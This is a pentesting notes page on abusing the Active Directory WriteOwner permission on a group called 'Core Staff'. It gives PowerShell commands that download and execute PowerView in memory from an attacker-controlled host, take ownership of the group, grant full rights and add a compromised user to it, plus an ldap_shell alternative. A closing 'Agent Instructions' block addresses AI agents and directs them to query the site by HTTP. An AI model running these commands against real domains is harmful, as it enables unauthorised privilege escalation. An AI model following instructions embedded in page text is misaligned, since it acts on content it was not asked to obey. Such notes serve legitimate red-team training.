# WriteOwner

Assuming a user has `WriteOwner` on a group. We can take control of the group and then we can add ourselves or any other user we compromised, into that group. We start by looking at the bloodhound graph.\
For this, we have a user called `JDGODD`, he has WriteOwner on a group called `Core Staff`, we can take control of the group, using PowerView.&#x20;

&#x20;

![WriteOwner Permission in Bloodhound](/files/xT7Z1UR3CIDqz8y0mMX4)

We start by importing PowerView. We can execute in memory by using `IEX.`

```powershell
iex(new-object net.webclient).downloadstring('http://10.10.xxpowers.xx/PowerView.ps1')
```

Then we use JDGOOD's password and store the password in a variable called `Creds`

```powershell
$SecPassword = ConvertTo-SecureString 'Password1!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\JDgodd', $SecPassword)
```

Now we chnage the OwnerIdentity and PrincipalIdentity of the group.

```powershell
Set-DomainObjectOwner -Identity 'CORE STAFF' -OwnerIdentity JDgodd -Cred $cred
Add-DomainObjectAcl -TargetIdentity "CORE STAFF" -PrincipalIdentity JDgodd -Cred $cred -Rights All
```

After all, we add the user into the group.

```powershell
Add-DomainGroupMember -Identity 'CORE STAFF' -Members 'JDgodd' -Cred $cred
```

To verify => `net group 'CORE STAFF'`

### Alternative Method

We can use `Ldap` to do this, for this we use a tool called [ldap\_shell](https://github.com/PShlyundin/ldap_shell)

```bash
ldap_shell domain.local/JDgodd:Password1 -dc-ip 10.10.xx.xx
```

After getting an interactive session, we can execute two commands that give us the important writes.&#x20;

```bash
set_genericall "CORE STAFF" "JDGODD"
add_user_to_group "<username> OR JDGODD" "CORE STAFF"
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.shashwatshah.me/windows/active-directory/writeowner.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.